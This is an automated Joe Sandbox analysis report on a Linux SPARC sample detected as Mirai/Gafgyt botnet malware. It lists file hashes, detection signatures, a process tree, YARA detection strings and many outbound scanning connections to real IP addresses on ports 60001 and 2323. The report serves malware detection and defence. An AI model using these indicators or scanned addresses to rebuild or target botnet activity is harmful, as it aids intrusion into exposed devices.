Linux Analysis Report SLdtSSVlj2

Overview

General Information

Sample Name: SLdtSSVlj2
Analysis ID: 553479
MD5: 6b355f508658f7fbe9c91fad5d09d6b5
SHA1: 72a9d43e568016e0384a39e391391498695328bd
SHA256: 9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
Tags: 32, elf, mirai, sparc

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Creates hidden files and/or directories
Sample has stripped symbol table

Analysis Advice

None of the HTTP servers contacted by the sample answered. The sample is likely an old dropper that no longer works.
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553479
Start date: 15.01.2022
Start time: 00:44:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 43s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SLdtSSVlj2
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.lin@0/4@0/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown

Process Tree

  • system is lnxubuntu20
  • SLdtSSVlj2 (PID: 5267, Parent: 5104, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/SLdtSSVlj2
  • systemd New Fork (PID: 5288, Parent: 1)
  • journalctl (PID: 5288, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5309, Parent: 1)
  • dbus-daemon (PID: 5309, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5321, Parent: 1)
  • whoopsie (PID: 5321, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5322, Parent: 1860)
  • pulseaudio (PID: 5322, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5323, Parent: 1)
  • rsyslogd (PID: 5323, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • fusermount (PID: 5324, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5325, Parent: 1)
  • systemd-journald (PID: 5325, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5326, Parent: 1334)
  • pulseaudio (PID: 5326, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5337, Parent: 1)
  • rtkit-daemon (PID: 5337, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5340, Parent: 1)
  • systemd-logind (PID: 5340, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5398, Parent: 1320)
  • Default (PID: 5398, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5399, Parent: 1)
  • dbus-daemon (PID: 5399, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • gdm3 New Fork (PID: 5400, Parent: 1320)
  • Default (PID: 5400, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5401, Parent: 1)
  • systemd-journald (PID: 5401, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5402, Parent: 1)
  • whoopsie (PID: 5402, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5403, Parent: 1)
  • rsyslogd (PID: 5403, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5404, Parent: 1334)
  • pulseaudio (PID: 5404, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5407, Parent: 1)
  • systemd-logind (PID: 5407, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5464, Parent: 1320)
  • Default (PID: 5464, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5465, Parent: 1)
  • dbus-daemon (PID: 5465, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5466, Parent: 1)
  • systemd-journald (PID: 5466, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5491, Parent: 1)
  • dbus-daemon (PID: 5491, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5496, Parent: 1)
  • whoopsie (PID: 5496, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5501, Parent: 1)
  • rsyslogd (PID: 5501, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5523, Parent: 1334)
  • pulseaudio (PID: 5523, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5527, Parent: 1)
  • dbus-daemon (PID: 5527, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5538, Parent: 1)
  • systemd-journald (PID: 5538, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5592, Parent: 1)
  • whoopsie (PID: 5592, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5595, Parent: 1)
  • rsyslogd (PID: 5595, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5599, Parent: 1)
  • rsyslogd (PID: 5599, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5600, Parent: 1)
  • whoopsie (PID: 5600, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5602, Parent: 1)
  • gpu-manager (PID: 5602, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5603, Parent: 1)
  • generate-config (PID: 5603, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5604, Parent: 1)
  • gpu-manager (PID: 5604, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5605, Parent: 1)
  • generate-config (PID: 5605, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5606, Parent: 1)
  • gpu-manager (PID: 5606, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5607, Parent: 1)
  • generate-config (PID: 5607, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5608, Parent: 1)
  • systemd New Fork (PID: 5609, Parent: 1)
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
SLdtSSVlj2 | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
SLdtSSVlj2 | Mirai_Botnet_Malware | Detects Mirai Botnet Malware | Florian Roth
  • 0x12c68:$x1: POST /cdn-cgi/
  • 0x14768:$s1: LCOGQGPTGP
  • 0x14280:$s4: QWRGPTKQMP
SLdtSSVlj2 | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth
  • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
SLdtSSVlj2 | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security
SLdtSSVlj2 | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security

      Memory Dumps

      Source | Rule | Description | Author | Strings
      5275.1.000000002ac99f32.000000004dded084.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
      • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5276.1.000000002ac99f32.000000004dded084.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
      • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
      • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp | Mirai_Botnet_Malware | Detects Mirai Botnet Malware | Florian Roth
      • 0x12c68:$x1: POST /cdn-cgi/
      • 0x14768:$s1: LCOGQGPTGP
      • 0x14280:$s4: QWRGPTKQMP
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth
      • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A

      Jbx Signature Overview

      AV Detection:

      Multi AV Scanner detection for submitted file
      Source: SLdtSSVlj2, Virustotal: Detection: 53%
      Source: SLdtSSVlj2, ReversingLabs: Detection: 62%

      Networking:

      Connects to many ports of the same IP (likely port scanning)
      Source: global traffic, TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
      Uses known network protocols on non-standard ports
      Source: unknown, Network traffic detected: HTTP traffic on port 49312 -> 60001
      Source: unknown, Network traffic detected: HTTP traffic on port 60001 -> 49312
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 133.40.139.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.208.86.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.169.154.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.24.142.230:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.14.41.34:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.183.232.18:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.243.57.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.35.92.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.119.27.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.138.147.184:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 147.20.20.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.106.147.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.125.161.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.223.181.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.135.9.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.121.143.16:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.38.250.166:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.23.74.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 27.247.87.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.250.224.179:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.148.171.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.145.9.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 132.94.65.114:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.221.90.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.189.16.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.244.217.176:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 17.33.171.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 175.154.155.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.78.2.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.202.126.27:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.195.99.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.112.230.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.6.46.129:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.70.14.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 218.20.41.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.68.140.241:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.19.118.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.222.43.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.21.205.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.80.241.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.131.116.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.198.161.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.155.190.102:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.108.176.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 69.9.26.68:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.196.155.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.234.98.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.147.247.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.255.43.4:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 135.213.173.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 210.202.218.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 41.46.37.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.89.41:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.90.249.17:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.3.41.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.53.105.84:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.153.139.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.214.6.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.239.238.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.241.214.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.247.65.145:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.17.183.125:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.218.220.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 143.197.76.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.29.15.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.187.126.42:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.41.6.181:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.186.199.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.206.13.243:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.131.36.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.154.225.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.216.116.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 203.188.120.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 40.232.237.164:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 100.235.237.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.120.15.101:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.46.251.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.167.229.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.164.55.195:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.29.52.121:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.135.128.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.55.18.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.195.149.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 105.124.39.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 158.218.110.103:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.210.145.229:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.221.92.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 23.67.190.152:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.246.65.242:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 83.205.81.248:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 167.165.177.98:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 31.141.132.247:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.121.0.237:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 132.234.2.150:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 141.178.238.177:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 203.98.221.137:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 73.142.96.208:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 159.28.12.71:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 48.193.25.197:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 35.57.21.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 99.252.13.187:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 66.129.239.80:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 104.202.221.102:2323
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.38.175.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 156.66.213.74:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.58.252.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.137.108.86:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.221.21.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.247.207.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.134.185.30:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.137.246.203:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 78.58.51.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.93.105.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.157.228.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.135.133.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.207.119.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 86.243.116.171:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.105.176.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.184.165.49:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 90.163.46.26:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.213.177.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 213.179.150.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.40.223.54:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.254.93.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.124.5.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.123.110.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.7.49.149:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 204.64.24.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.13.74.206:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 104.238.86.213:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.137.224.126:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.104.26.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.73.137.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.132.15.65:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.113.249.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.221.204.12:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 198.36.53.24:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.63.45.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.160.21.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.86.128.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.147.108.208:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.136.97.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.136.152.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.184.15.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.249.189.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 177.253.251.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.64.88.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.171.230.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.98.45.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 82.121.57.163:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.120.150.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.12.82.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.210.165.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.239.139.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 52.179.164.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 102.58.179.252:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.74.243.78:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 62.252.156.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.10.130.133:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.208.236.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.134.96.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.127.214.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.143.13.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.124.154.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.77.127.138:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.245.72.172:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.201.118.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.149.154.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.182.75.240:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.97.128.205:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.53.154.192:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.227.22.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.91.13.82:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 188.224.212.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.106.24.29:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.226.36.193:60001
